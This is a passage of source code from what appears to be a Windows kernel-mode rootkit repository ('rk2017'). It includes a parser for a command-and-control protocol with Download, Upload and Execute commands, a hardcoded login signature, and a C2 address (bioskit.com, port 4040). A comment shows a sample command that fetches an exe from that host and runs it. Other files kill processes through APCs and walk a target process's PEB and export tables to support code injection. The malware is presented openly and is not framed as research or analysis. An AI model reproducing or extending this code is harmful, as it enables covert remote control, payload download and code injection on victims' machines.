RtlCopyMemory(pLocalDat,pCmdLineA,__STRLEN__(pCmdLineA)); 137 | pCurCmd = MyStrChr(pLocalDat,':'); 138 | if (pCurCmd) 139 | { 140 | pCurCmd[0] = '\0'; 141 | pCurCmd += 1; 142 | } 143 | RtlCopyMemory((*ppCmdLinePack)->CmdSignatureA,pLocalDat,__STRLEN__(pLocalDat)); 144 | while (TRUE) 145 | { 146 | if (__STRNCMPI__(pCurCmd,"https",__STRLEN__("https")) == 0) 147 | { 148 | (*ppCmdLinePack)->AddressType = HttpsAddress; 149 | pCurCmd = GetNextCmdLine(pCurCmd,&bIsEnd); 150 | if (pCurCmd) 151 | { 152 | RtlCopyMemory((*ppCmdLinePack)->AddressDatA,pCurCmd,__STRLEN__(pCurCmd)); 153 | pCurCmd += __STRLEN__(pCurCmd) + sizeof(CHAR); 154 | } 155 | } 156 | else if (__STRNCMPI__(pCurCmd,"http",__STRLEN__("http")) == 0) 157 | { 158 | (*ppCmdLinePack)->AddressType = HttpAddress; 159 | pCurCmd = GetNextCmdLine(pCurCmd,&bIsEnd); 160 | if (pCurCmd) 161 | { 162 | RtlCopyMemory((*ppCmdLinePack)->AddressDatA,pCurCmd,__STRLEN__(pCurCmd)); 163 | pCurCmd += __STRLEN__(pCurCmd) + sizeof(CHAR); 164 | } 165 | } 166 | else if (__STRNCMPI__(pCurCmd,"ftp",__STRLEN__("ftp")) == 0) 167 | { 168 | (*ppCmdLinePack)->AddressType = FtpAddress; 169 | pCurCmd = GetNextCmdLine(pCurCmd,&bIsEnd); 170 | if (pCurCmd) 171 | { 172 | RtlCopyMemory((*ppCmdLinePack)->AddressDatA,pCurCmd,__STRLEN__(pCurCmd)); 173 | pCurCmd += __STRLEN__(pCurCmd) + sizeof(CHAR); 174 | } 175 | } 176 | else if (__STRNCMPI__(pCurCmd,"ip",__STRLEN__("ip")) == 0) 177 | { 178 | (*ppCmdLinePack)->AddressType = IpAddress; 179 | pCurCmd = GetNextCmdLine(pCurCmd,&bIsEnd); 180 | if (pCurCmd) 181 | { 182 | RtlCopyMemory((*ppCmdLinePack)->AddressDatA,pCurCmd,__STRLEN__(pCurCmd)); 183 | pCurCmd += __STRLEN__(pCurCmd) + sizeof(CHAR); 184 | } 185 | } 186 | else if (__STRNCMPI__(pCurCmd,"System",__STRLEN__("System")) == 0) 187 | { 188 | pCurCmd = MyStrChr(pCurCmd,':'); 189 | pCurCmd = GetNextCmdLine(pCurCmd,&bIsEnd); 190 | if (pCurCmd) 191 | { 192 | (*ppCmdLinePack)->SystemType = GetSystemType(pCurCmd); 193 | pCurCmd += __STRLEN__(pCurCmd) + sizeof(CHAR); 194 | } 195 | } 196 | else if (__STRNCMPI__(pCurCmd,"Path",__STRLEN__("Path")) == 0) 197 | { 198 | pCurCmd = MyStrChr(pCurCmd,':'); 199 | pCurCmd = GetNextCmdLine(pCurCmd,&bIsEnd); 200 | if (pCurCmd) 201 | { 202 | RtlCopyMemory((*ppCmdLinePack)->PathDatA,pCurCmd,__STRLEN__(pCurCmd)); 203 | pCurCmd += __STRLEN__(pCurCmd) + sizeof(CHAR); 204 | } 205 | } 206 | else if (__STRNCMPI__(pCurCmd,"Type",__STRLEN__("Type")) == 0) 207 | { 208 | pCurCmd = GetNextCmdLine(pCurCmd,&bIsEnd); 209 | if (pCurCmd) 210 | { 211 | (*ppCmdLinePack)->FileTypeSuffix = GetFileSuffixType(pCurCmd); 212 | pCurCmd += __STRLEN__(pCurCmd) + sizeof(CHAR); 213 | } 214 | } 215 | else if (__STRNCMPI__(pCurCmd,"Command",__STRLEN__("Command")) == 0) 216 | { 217 | pCurCmd = GetNextCmdLine(pCurCmd,&bIsEnd); 218 | if (pCurCmd) 219 | { 220 | (*ppCmdLinePack)->CommandLineType = GetCommandLineType(pCurCmd); 221 | pCurCmd += __STRLEN__(pCurCmd) + sizeof(CHAR); 222 | } 223 | } 224 | else 225 | { 226 | } 227 | if (bIsEnd) 228 | { 229 | break; 230 | } 231 | } 232 | if (pLocalDat) 233 | { 234 | KernelFree(pLocalDat); 235 | } 236 | return; 237 | } 238 | 239 | BOOLEAN ProcessCommandLine(PCHAR pCmdLineA,PCOMMAND_LINE_PACK *pRetCmdLinePack) 240 | { 241 | PCOMMAND_LINE_PACK pCmdLinePack; 242 | 243 | if (NULL == pCmdLineA) 244 | { 245 | return FALSE; 246 | } 247 | pCmdLinePack = NULL; 248 | *pRetCmdLinePack = NULL; 249 | do 250 | { 251 | *pRetCmdLinePack = (PCOMMAND_LINE_PACK)KernelMalloc(sizeof(COMMAND_LINE_PACK)); 252 | } while (NULL == *pRetCmdLinePack); 253 | RtlZeroMemory(*pRetCmdLinePack,sizeof(COMMAND_LINE_PACK)); 254 | ParseCommandLine(pCmdLineA,pRetCmdLinePack); 255 | if (*(PULONG_PTR)((*pRetCmdLinePack)->CmdSignatureA)) 256 | { 257 | return TRUE; 258 | } 259 | return FALSE; 260 | } -------------------------------------------------------------------------------- /rk/CommandLine.h: -------------------------------------------------------------------------------- 1 | #ifndef __COMMAND_LINE_H__ 2 | #define __COMMAND_LINE_H__ 3 | 4 | #define DOWNLOAD_COMMAND_SIGNATURE "@GodsElohim@Download@" 5 | #define UPLOAD_COMMAND_SIGNATURE "@GodsElohim@Upload@" 6 | #define EXECUTE_COMMAND_SIGNATURE "@GodsElohim@Execute@" 7 | 8 | #define LOGIN_SIGNATURE "@MeinerLordIstGodsElohimIchFragteDichHastDuAlles?@" 9 | typedef enum _ADDRESS_TYPE 10 | { 11 | HttpsAddress = 1, 12 | HttpAddress, 13 | FtpAddress, 14 | IpAddress, 15 | LocalAddress 16 | }ADDRESS_TYPE,*PADDRESS_TYPE; 17 | 18 | typedef enum _SYSTEM_TYPE 19 | { 20 | Windows = 1, 21 | MacOs, 22 | Linux, 23 | CentOs, 24 | FreeBSD, 25 | Unknow 26 | }SYSTEM_TYPE,*PSYSTEM_TYPE; 27 | 28 | typedef enum _FILE_TYPE_SUFFIX 29 | { 30 | FileTypeExe = 1, 31 | FileTypeDll, 32 | FileTypeSys, 33 | FileTypeElf, 34 | FileTypeSo, 35 | FileTypeBin 36 | }FILE_TYPE_SUFFIX,*PFILE_TYPE_SUFFIX; 37 | 38 | typedef enum _COMMAND_LINE_TYPE 39 | { 40 | CmdRun = 1, 41 | LoadDrv, 42 | Inject, 43 | ShellCode 44 | }COMMAND_LINE_TYPE,*PCOMMAND_LINE_TYPE; 45 | //Download:Http:bioskit.com/fuck.exe:System:Windows:Path:C:\Temp:Type:Exe:Command:Run; 46 | 47 | #pragma pack(push) 48 | #pragma pack(1) 49 | typedef struct _COMMAND_LINE_PACK 50 | { 51 | CHAR CmdSignatureA[50]; 52 | ADDRESS_TYPE AddressType; 53 | CHAR AddressDatA[MAX_PATH]; 54 | SYSTEM_TYPE SystemType; 55 | CHAR PathDatA[MAX_PATH]; 56 | FILE_TYPE_SUFFIX FileTypeSuffix; 57 | COMMAND_LINE_TYPE CommandLineType; 58 | } COMMAND_LINE_PACK,*PCOMMAND_LINE_PACK; 59 | ////Upload:LocalPath:C:\fuck.exe:System:Windows:RemotePath:C:\Temp; 60 | //typedef struct _UPLOAD_RUN_COMMAND_PACK 61 | //{ 62 | // CHAR CmdSignatureA[50]; 63 | // ADDRESS_TYPE AddressType; 64 | // CHAR AddressDatA[MAX_PATH]; 65 | // SYSTEM_TYPE SystemType; 66 | // CHAR PathDatA[MAX_PATH]; 67 | // FILE_TYPE_SUFFIX FileTypeSuffix; 68 | // COMMAND_LINE_TYPE CommandLineType; 69 | //}UPLOAD_RUN_COMMAND_PACK,*PUPLOAD_RUN_COMMAND_PACK; 70 | typedef struct _LOGIN_PACKET 71 | { 72 | CHAR LoginSignatureA[50]; 73 | ULONG ulCheckCrc32; 74 | } LOGIN_PACKET,*PLOGIN_PACKET; 75 | 76 | typedef struct _COMMAND_LIST 77 | { 78 | LIST_ENTRY NextCmdLine; 79 | PCOMMAND_LINE_PACK pCommandLinePack; 80 | } COMMAND_LIST,*PCOMMAND_LIST; 81 | 82 | typedef struct _CHECK_PACKET 83 | { 84 | ULONG ulRecvCrc32; 85 | } CHECK_PACKET,*PCHECK_PACKET; 86 | extern LIST_ENTRY g_CommandListPack; 87 | extern KSPIN_LOCK g_CommandListSpinLock; 88 | 89 | #pragma pack(pop) 90 | 91 | BOOLEAN ProcessCommandLine(PCHAR pCmdLineA,PCOMMAND_LINE_PACK *pRetCmdLinePack); 92 | 93 | #endif -------------------------------------------------------------------------------- /rk/CopyPdb.bat: -------------------------------------------------------------------------------- 1 | copy C:\PassPKit\rk2017\Bin\rk.pdb C:\NT_SYMBOL_PATH\rk.pdb /y 2 | copy C:\PassPKit\rk2017\Bin\rk.pdb D:\VMwareMachine\Windows8X86-LocalSym\rk.pdb /y 3 | copy C:\PassPKit\rk2017\Bin\rk.pdb D:\VMwareMachine\Windows7X86-LocalSym\rk.pdb /y 4 | copy C:\PassPKit\rk2017\Bin\rk.pdb D:\VMwareMachine\WindowsXp32-LocalSym\rk.pdb /y 5 | copy C:\PassPKit\rk2017\Bin\rk.pdb D:\VMwareMachine\WindowsXp-LocalSym\rk.pdb /y 6 | copy C:\PassPKit\rk2017\Bin\rk.pdb D:\VMwareMachine\WindowsServer2003-LocalSym\rk.pdb /y 7 | copy C:\PassPKit\rk2017\Bin\rk.sys C:\ShareDirectory\rk.sys /y -------------------------------------------------------------------------------- /rk/Crc32.c: -------------------------------------------------------------------------------- 1 | #include "rk.h" 2 | #include "Crc32.h" 3 | 4 | static unsigned long crc32tab[] = { 5 | 0x00000000L, 0x77073096L, 0xEE0E612CL, 0x990951BAL, 6 | 0x076DC419L, 0x706AF48FL, 0xE963A535L, 0x9E6495A3L, 7 | 0x0EDB8832L, 0x79DCB8A4L, 0xE0D5E91EL, 0x97D2D988L, 8 | 0x09B64C2BL, 0x7EB17CBDL, 0xE7B82D07L, 0x90BF1D91L, 9 | 0x1DB71064L, 0x6AB020F2L, 0xF3B97148L, 0x84BE41DEL, 10 | 0x1ADAD47DL, 0x6DDDE4EBL, 0xF4D4B551L, 0x83D385C7L, 11 | 0x136C9856L, 0x646BA8C0L, 0xFD62F97AL, 0x8A65C9ECL, 12 | 0x14015C4FL, 0x63066CD9L, 0xFA0F3D63L, 0x8D080DF5L, 13 | 0x3B6E20C8L, 0x4C69105EL, 0xD56041E4L, 0xA2677172L, 14 | 0x3C03E4D1L, 0x4B04D447L, 0xD20D85FDL, 0xA50AB56BL, 15 | 0x35B5A8FAL, 0x42B2986CL, 0xDBBBC9D6L, 0xACBCF940L, 16 | 0x32D86CE3L, 0x45DF5C75L, 0xDCD60DCFL, 0xABD13D59L, 17 | 0x26D930ACL, 0x51DE003AL, 0xC8D75180L, 0xBFD06116L, 18 | 0x21B4F4B5L, 0x56B3C423L, 0xCFBA9599L, 0xB8BDA50FL, 19 | 0x2802B89EL, 0x5F058808L, 0xC60CD9B2L, 0xB10BE924L, 20 | 0x2F6F7C87L, 0x58684C11L, 0xC1611DABL, 0xB6662D3DL, 21 | 0x76DC4190L, 0x01DB7106L, 0x98D220BCL, 0xEFD5102AL, 22 | 0x71B18589L, 0x06B6B51FL, 0x9FBFE4A5L, 0xE8B8D433L, 23 | 0x7807C9A2L, 0x0F00F934L, 0x9609A88EL, 0xE10E9818L, 24 | 0x7F6A0DBBL, 0x086D3D2DL, 0x91646C97L, 0xE6635C01L, 25 | 0x6B6B51F4L, 0x1C6C6162L, 0x856530D8L, 0xF262004EL, 26 | 0x6C0695EDL, 0x1B01A57BL, 0x8208F4C1L, 0xF50FC457L, 27 | 0x65B0D9C6L, 0x12B7E950L, 0x8BBEB8EAL, 0xFCB9887CL, 28 | 0x62DD1DDFL, 0x15DA2D49L, 0x8CD37CF3L, 0xFBD44C65L, 29 | 0x4DB26158L, 0x3AB551CEL, 0xA3BC0074L, 0xD4BB30E2L, 30 | 0x4ADFA541L, 0x3DD895D7L, 0xA4D1C46DL, 0xD3D6F4FBL, 31 | 0x4369E96AL, 0x346ED9FCL, 0xAD678846L, 0xDA60B8D0L, 32 | 0x44042D73L, 0x33031DE5L, 0xAA0A4C5FL, 0xDD0D7CC9L, 33 | 0x5005713CL, 0x270241AAL, 0xBE0B1010L, 0xC90C2086L, 34 | 0x5768B525L, 0x206F85B3L, 0xB966D409L, 0xCE61E49FL, 35 | 0x5EDEF90EL, 0x29D9C998L, 0xB0D09822L, 0xC7D7A8B4L, 36 | 0x59B33D17L, 0x2EB40D81L, 0xB7BD5C3BL, 0xC0BA6CADL, 37 | 0xEDB88320L, 0x9ABFB3B6L, 0x03B6E20CL, 0x74B1D29AL, 38 | 0xEAD54739L, 0x9DD277AFL, 0x04DB2615L, 0x73DC1683L, 39 | 0xE3630B12L, 0x94643B84L, 0x0D6D6A3EL, 0x7A6A5AA8L, 40 | 0xE40ECF0BL, 0x9309FF9DL, 0x0A00AE27L, 0x7D079EB1L, 41 | 0xF00F9344L, 0x8708A3D2L, 0x1E01F268L, 0x6906C2FEL, 42 | 0xF762575DL, 0x806567CBL, 0x196C3671L, 0x6E6B06E7L, 43 | 0xFED41B76L, 0x89D32BE0L, 0x10DA7A5AL, 0x67DD4ACCL, 44 | 0xF9B9DF6FL, 0x8EBEEFF9L, 0x17B7BE43L, 0x60B08ED5L, 45 | 0xD6D6A3E8L, 0xA1D1937EL, 0x38D8C2C4L, 0x4FDFF252L, 46 | 0xD1BB67F1L, 0xA6BC5767L, 0x3FB506DDL, 0x48B2364BL, 47 | 0xD80D2BDAL, 0xAF0A1B4CL, 0x36034AF6L, 0x41047A60L, 48 | 0xDF60EFC3L, 0xA867DF55L, 0x316E8EEFL, 0x4669BE79L, 49 | 0xCB61B38CL, 0xBC66831AL, 0x256FD2A0L, 0x5268E236L, 50 | 0xCC0C7795L, 0xBB0B4703L, 0x220216B9L, 0x5505262FL, 51 | 0xC5BA3BBEL, 0xB2BD0B28L, 0x2BB45A92L, 0x5CB36A04L, 52 | 0xC2D7FFA7L, 0xB5D0CF31L, 0x2CD99E8BL, 0x5BDEAE1DL, 53 | 0x9B64C2B0L, 0xEC63F226L, 0x756AA39CL, 0x026D930AL, 54 | 0x9C0906A9L, 0xEB0E363FL, 0x72076785L, 0x05005713L, 55 | 0x95BF4A82L, 0xE2B87A14L, 0x7BB12BAEL, 0x0CB61B38L, 56 | 0x92D28E9BL, 0xE5D5BE0DL, 0x7CDCEFB7L, 0x0BDBDF21L, 57 | 0x86D3D2D4L, 0xF1D4E242L, 0x68DDB3F8L, 0x1FDA836EL, 58 | 0x81BE16CDL, 0xF6B9265BL, 0x6FB077E1L, 0x18B74777L, 59 | 0x88085AE6L, 0xFF0F6A70L, 0x66063BCAL, 0x11010B5CL, 60 | 0x8F659EFFL, 0xF862AE69L, 0x616BFFD3L, 0x166CCF45L, 61 | 0xA00AE278L, 0xD70DD2EEL, 0x4E048354L, 0x3903B3C2L, 62 | 0xA7672661L, 0xD06016F7L, 0x4969474DL, 0x3E6E77DBL, 63 | 0xAED16A4AL, 0xD9D65ADCL, 0x40DF0B66L, 0x37D83BF0L, 64 | 0xA9BCAE53L, 0xDEBB9EC5L, 0x47B2CF7FL, 0x30B5FFE9L, 65 | 0xBDBDF21CL, 0xCABAC28AL, 0x53B39330L, 0x24B4A3A6L, 66 | 0xBAD03605L, 0xCDD70693L, 0x54DE5729L, 0x23D967BFL, 67 | 0xB3667A2EL, 0xC4614AB8L, 0x5D681B02L, 0x2A6F2B94L, 68 | 0xB40BBE37L, 0xC30C8EA1L, 0x5A05DF1BL, 0x2D02EF8DL 69 | }; 70 | 71 | void crc32Init(unsigned int *pCrc32) 72 | { 73 | *pCrc32 = 0xFFFFFFFF; 74 | } 75 | 76 | void crc32Update(unsigned int *pCrc32, const char *pData, unsigned int uSize) 77 | { 78 | unsigned int i = 0; 79 | 80 | for(i = 0; i < uSize; i++) 81 | *pCrc32 = ((*(int*)pCrc32) >> 8) ^ crc32tab[(pData[i]) ^ ((*(int*)pCrc32) & 0xFF)]; 82 | } 83 | 84 | // Make the final adjustment 85 | void crc32Finish(unsigned int *pCrc32) 86 | { 87 | *pCrc32 = ~(*pCrc32); 88 | } 89 | 90 | unsigned long POLYNOMIAL = 0xEDB88320; 91 | int have_table = 0 ; 92 | unsigned long table[256] ; 93 | 94 | 95 | void make_table() 96 | { 97 | int i,j; 98 | have_table = 1 ; 99 | for (i = 0 ; i < 256 ; i++) 100 | for (j = 0, table[i] = i ; j < 8 ; j++) 101 | table[i] = (table[i]>>1)^((table[i]&1)?POLYNOMIAL:0) ; 102 | } 103 | 104 | 105 | unsigned long MyCrc32(unsigned long crc, char *buff, int len) 106 | { 107 | int i; 108 | if (!have_table) make_table() ; 109 | crc = ~crc; 110 | for (i = 0; i < len; i++) 111 | crc = (crc >> 8) ^ table[(crc ^ buff[i]) & 0xff]; 112 | return ~crc; 113 | } 114 | -------------------------------------------------------------------------------- /rk/Crc32.h: -------------------------------------------------------------------------------- 1 | #ifndef __CRC32_H__ 2 | #define __CRC32_H__ 3 | 4 | void crc32Init(unsigned int *pCrc32); 5 | void crc32Update(unsigned int *pCrc32, const char *pData, unsigned int uSize); 6 | void crc32Finish(unsigned int *pCrc32); 7 | unsigned long MyCrc32(unsigned long crc, char *buff, int len); 8 | 9 | #endif -------------------------------------------------------------------------------- /rk/DefSSDT.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeviceObject/rk2017/8f0cfa5845446d864bd9e1ee06041ed5b29f7948/rk/DefSSDT.h -------------------------------------------------------------------------------- /rk/DefSystemVar.h: -------------------------------------------------------------------------------- 1 | #ifndef __DEF_SYSTEM_VAR_H__ 2 | #define __DEF_SYSTEM_VAR_H__ 3 | 4 | typedef struct _SYSTEM_PROCESS_INFORMATION 5 | { 6 | ULONG NextEntryDelta; 7 | ULONG ThreadCount; 8 | ULONG Reserved1[6]; 9 | LARGE_INTEGER ftCreateTime; 10 | LARGE_INTEGER ftUserTime; 11 | LARGE_INTEGER ftKernelTime; 12 | UNICODE_STRING ProcessName; 13 | ULONG BasePriority; 14 | ULONG ProcessId; 15 | ULONG InheritedFromProcessId; 16 | ULONG HandleCount; 17 | ULONG Reserved2[2]; 18 | ULONG VmCounters; 19 | ULONG dCommitCharge; 20 | PVOID ThreadInfos[1]; 21 | }SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION; 22 | 23 | typedef struct _SYSTEM_THREAD_INFORMATION 24 | { 25 | LARGE_INTEGER KernelTime; 26 | LARGE_INTEGER UserTime; 27 | LARGE_INTEGER CreateTime; 28 | ULONG WaitTime; 29 | PVOID StartAddress; 30 | CLIENT_ID ClientId; 31 | KPRIORITY Priority; 32 | KPRIORITY BasePriority; 33 | ULONG ContextSwitchCount; 34 | LONG State; 35 | LONG WaitReason; 36 | }SYSTEM_THREAD_INFORMATION,*PSYSTEM_THREAD_INFORMATION; 37 | 38 | typedef struct _SYSTEM_MODULE_INFORMATION 39 | { 40 | ULONG Reserved[2]; 41 | PVOID Base; 42 | ULONG Size; 43 | ULONG Flags; 44 | USHORT Index; 45 | USHORT Unknown; 46 | USHORT LoadCount; 47 | USHORT ModuleNameOffset; 48 | CHAR ImageName[256]; 49 | } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; 50 | 51 | typedef enum _SYSTEM_INFORMATION_CLASS 52 | { 53 | SystemBasicInformation, 54 | SystemProcessorInformation, 55 | SystemPerformanceInformation, 56 | SystemTimeOfDayInformation, 57 | SystemNotImplemented1, 58 | SystemProcessesAndThreadsInformation, 59 | SystemCallCounts, 60 | SystemConfigurationInformation, 61 | SystemProcessorTimes, 62 | SystemGlobalFlag, 63 | SystemNotImplemented2, 64 | SystemModuleInformation, 65 | SystemLockInformation, 66 | SystemNotImplemented3, 67 | SystemNotImplemented4, 68 | SystemNotImplemented5, 69 | SystemHandleInformation, 70 | SystemObjectInformation, 71 | SystemPagefileInformation, 72 | SystemInstructionEmulationCounts, 73 | SystemInvalidInfoClass1, 74 | SystemCacheInformation, 75 | SystemPoolTagInformation, 76 | SystemProcessorStatistics, 77 | SystemDpcInformation, 78 | SystemNotImplemented6, 79 | SystemLoadImage, 80 | SystemUnloadImage, 81 | SystemTimeAdjustment, 82 | SystemNotImplemented7, 83 | SystemNotImplemented8, 84 | SystemNotImplemented9, 85 | SystemCrashDumpInformation, 86 | SystemExceptionInformation, 87 | SystemCrashDumpStateInformation, 88 | SystemKernelDebuggerInformation, 89 | SystemContextSwitchInformation, 90 | SystemRegistryQuotaInformation, 91 | SystemLoadAndCallImage, 92 | SystemPrioritySeparation, 93 | SystemNotImplemented10, 94 | SystemNotImplemented11, 95 | SystemInvalidInfoClass2, 96 | SystemInvalidInfoClass3, 97 | SystemTimeZoneInformation, 98 | SystemLookasideInformation, 99 | SystemSetTimeSlipEvent, 100 | SystemCreateSession, 101 | SystemDeleteSession, 102 | SystemInvalidInfoClass4, 103 | SystemRangeStartInformation, 104 | SystemVerifierInformation, 105 | SystemAddVerifier, 106 | SystemSessionProcessesInformation 107 | } SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS; 108 | 109 | extern POBJECT_TYPE *IoDriverObjectType; 110 | 111 | 112 | NTKERNELAPI NTSTATUS ObReferenceObjectByName(IN PUNICODE_STRING ObjectName, 113 | IN ULONG Attributes, 114 | IN PACCESS_STATE PassedAccessState OPTIONAL, 115 | IN ACCESS_MASK DesiredAccess OPTIONAL, 116 | IN POBJECT_TYPE ObjectType OPTIONAL, 117 | IN KPROCESSOR_MODE AccessMode, 118 | IN OUT PVOID ParseContext OPTIONAL, 119 | OUT PVOID *Object); 120 | 121 | NTKERNELAPI NTSTATUS ZwQuerySystemInformation(IN SYSTEM_INFORMATION_CLASS SystemInformationClass, 122 | OUT PVOID SystemInformation, 123 | IN ULONG SystemInformationLength, 124 | OUT PULONG ReturnLength OPTIONAL); 125 | 126 | 127 | NTSYSAPI NTSTATUS NTAPI ZwDeviceIoControlFile( 128 | IN HANDLE FileHandle, 129 | IN HANDLE Event OPTIONAL, 130 | IN PIO_APC_ROUTINE ApcRoutine OPTIONAL, 131 | IN PVOID ApcContext OPTIONAL, 132 | OUT PIO_STATUS_BLOCK IoStatusBlock, 133 | IN ULONG IoControlCode, 134 | IN PVOID InputBuffer OPTIONAL, 135 | IN ULONG InputBufferLength, 136 | OUT PVOID OutputBuffer OPTIONAL, 137 | IN ULONG OutputBufferLength ); 138 | 139 | 140 | 141 | typedef NTSTATUS (*ZWDEVICECONTROLIOFILE)( 142 | IN HANDLE FileHandle, 143 | IN HANDLE Event OPTIONAL, 144 | IN PIO_APC_ROUTINE ApcRoutine OPTIONAL, 145 | IN PVOID ApcContext OPTIONAL, 146 | OUT PIO_STATUS_BLOCK IoStatusBlock, 147 | IN ULONG IoControlCode, 148 | IN PVOID InputBuffer OPTIONAL, 149 | IN ULONG InputBufferLength, 150 | OUT PVOID OutputBuffer OPTIONAL, 151 | IN ULONG OutputBufferLength); 152 | 153 | 154 | #define PS_CROSS_THREAD_FLAGS_SYSTEM 0x00000010UL 155 | #endif -------------------------------------------------------------------------------- /rk/DrvFileSystem.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeviceObject/rk2017/8f0cfa5845446d864bd9e1ee06041ed5b29f7948/rk/DrvFileSystem.c -------------------------------------------------------------------------------- /rk/DrvFileSystem.h: -------------------------------------------------------------------------------- 1 | #ifndef __DRV_FILE_SYSTEM_H__ 2 | #define __DRV_FILE_SYSTEM_H__ 3 | 4 | #define CONNECT_COMMAND_PACKET_URL "http://www.bioskit.com" 5 | #define CONNECT_COMMAND_PACKET_PORT 4040 6 | 7 | void CheckFileSystem(PDRIVER_OBJECT pDriverObject); 8 | //NTSTATUS DoWork(PINJECT_RELEVANT_OFFSET pInjectRelevantOffset); 9 | VOID SystemReboot(); 10 | 11 | extern BOOLEAN g_bExitGuardThread; 12 | extern BOOLEAN g_bUninstalled; 13 | extern PCHAR g_pVbr; 14 | 15 | #endif -------------------------------------------------------------------------------- /rk/DrvFunction.c: -------------------------------------------------------------------------------- 1 | #include "rk.h" 2 | #include "ApcKillProcess.h" 3 | #include "DrvFunction.h" 4 | 5 | NTSTATUS KillProcessByApc(HANDLE hProcessId) 6 | { 7 | NTSTATUS Status; 8 | PVOID pCurProc; 9 | 10 | Status = STATUS_UNSUCCESSFUL; 11 | pCurProc = NULL; 12 | 13 | Status = PsLookupProcessByProcessId(hProcessId,(PEPROCESS*)&pCurProc); 14 | if (NT_SUCCESS(Status)) 15 | { 16 | ObDereferenceObject(pCurProc); 17 | KillProcessWithApc(pCurProc); 18 | } 19 | return Status; 20 | } 21 | BOOLEAN SetCurrentProcess(HANDLE Pid) 22 | { 23 | PVOID pProcess; 24 | 25 | pProcess = NULL; 26 | 27 | if (0 == Pid) 28 | { 29 | return FALSE; 30 | } 31 | if (NT_SUCCESS(PsLookupProcessByProcessId(Pid,(PEPROCESS*)&pProcess))) 32 | { 33 | ObDereferenceObject(pProcess); 34 | return TRUE; 35 | } 36 | return FALSE; 37 | } 38 | BOOLEAN SetCurClientPath(WCHAR *wPath) 39 | { 40 | if (NULL == wPath) 41 | { 42 | return FALSE; 43 | } 44 | return FALSE; 45 | } -------------------------------------------------------------------------------- /rk/DrvFunction.h: -------------------------------------------------------------------------------- 1 | #ifndef __DRV_FUNCTION_H__ 2 | #define __DRV_FUNCTION_H__ 3 | 4 | BOOLEAN SetCurrentProcess(HANDLE Pid); 5 | BOOLEAN SetCurClientPath(WCHAR *wPath); 6 | NTSTATUS KillProcessByApc(HANDLE hProcessId); 7 | 8 | #endif -------------------------------------------------------------------------------- /rk/DrvRegSystem.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeviceObject/rk2017/8f0cfa5845446d864bd9e1ee06041ed5b29f7948/rk/DrvRegSystem.c -------------------------------------------------------------------------------- /rk/DrvRegSystem.h: -------------------------------------------------------------------------------- 1 | #ifndef __DRV_REG_SYSTEM_H__ 2 | #define __DRV_REG_SYSTEM_H__ 3 | 4 | #define SERVICE_DRIVER_REG_PATH L"\\registry\\machine\\system\\currentcontrolset\\services\\" 5 | 6 | LONG RegRead(PWCHAR pValueNameW,PWCHAR pDriverNameW); 7 | VOID RegWrite(PWCHAR pValueNameW,PWCHAR pDriverNameW,ULONG ulValue); 8 | #endif -------------------------------------------------------------------------------- /rk/GetProcAddr.c: -------------------------------------------------------------------------------- 1 | #include "rk.h" 2 | #include "InitializeInjectRelevantInfo.h" 3 | #include "InjectKtrapFrame.h" 4 | #include "GetProcAddr.h" 5 | 6 | ULONG_PTR GetModuleBaseFromPeb(PINJECT_OBJECT_INFORMATION pInjectObjInfo,PCHAR pModuleName) 7 | { 8 | PPEB Peb; 9 | PPEB_LDR_DATA pPebLdrDat; 10 | PLDR_MODULE pLdrModule; 11 | PLIST_ENTRY pCurListEntry; 12 | PLIST_ENTRY pHeaderListEntry; 13 | ANSI_STRING aStrModuleName; 14 | UNICODE_STRING unStrModuleName; 15 | 16 | if (NULL == pInjectObjInfo || \ 17 | NULL == pModuleName) 18 | { 19 | return (ULONG_PTR)NULL; 20 | } 21 | RtlInitAnsiString(&aStrModuleName,pModuleName); 22 | RtlAnsiStringToUnicodeString(&unStrModuleName,&aStrModuleName,TRUE); 23 | Peb = (PPEB)*(ULONG_PTR*)((ULONG_PTR)pInjectObjInfo->pInjectProcess + g_InjectRelevantOffset.ulOffsetPeb); 24 | if (NULL == Peb) 25 | { 26 | RtlFreeUnicodeString(&unStrModuleName); 27 | return (ULONG_PTR)NULL; 28 | } 29 | pPebLdrDat = (PPEB_LDR_DATA)*(ULONG_PTR*)((ULONG_PTR)Peb + g_InjectRelevantOffset.ulOffsetPebLdr); 30 | if (NULL == pPebLdrDat) 31 | { 32 | RtlFreeUnicodeString(&unStrModuleName); 33 | return (ULONG_PTR)NULL; 34 | } 35 | pHeaderListEntry = pCurListEntry = pPebLdrDat->InLoadOrderModuleList.Flink; 36 | while (pHeaderListEntry != pCurListEntry->Flink) 37 | { 38 | pLdrModule = (PLDR_MODULE)pCurListEntry; 39 | if (NULL == pLdrModule) 40 | { 41 | continue; 42 | } 43 | if (RtlCompareUnicodeString(&pLdrModule->BaseDllName,&unStrModuleName,TRUE) == 0) 44 | { 45 | RtlFreeUnicodeString(&unStrModuleName); 46 | return (ULONG_PTR)pLdrModule->BaseAddress; 47 | } 48 | pCurListEntry = pCurListEntry->Flink; 49 | } 50 | RtlFreeUnicodeString(&unStrModuleName); 51 | return (ULONG_PTR)NULL; 52 | } 53 | ULONG_PTR GetExportFunction(PVOID pBaseAddress,PCHAR pFunctionName) 54 | { 55 | PIMAGE_DOS_HEADER pDosHeader; 56 | PIMAGE_NT_HEADERS pNtHeader; 57 | PIMAGE_EXPORT_DIRECTORY pEat; 58 | BOOLEAN bIsWow64Bits; 59 | ULONG ulNumberOfNames,uli; 60 | ULONG *ulAddressOfNames; 61 | ULONG *ulAddressOfFunctions; 62 | USHORT *ulAddressOfNameOrdinals; 63 | USHORT ulFunctionsOrdinals; 64 | PCHAR pTargetApiName,pTargetApiAddress; 65 | 66 | if (NULL == pBaseAddress || \ 67 | NULL == pFunctionName) 68 | { 69 | return (ULONG_PTR)NULL; 70 | } 71 | pDosHeader = (PIMAGE_DOS_HEADER)pBaseAddress; 72 | if (pDosHeader->e_magic != IMAGE_DOS_SIGNATURE) 73 | { 74 | return (ULONG_PTR)NULL; 75 | } 76 | pNtHeader = (PIMAGE_NT_HEADERS)((ULONG_PTR)pDosHeader + pDosHeader->e_lfanew); 77 | if (pNtHeader->Signature != IMAGE_NT_SIGNATURE) 78 | { 79 | return (ULONG_PTR)NULL; 80 | } 81 | if 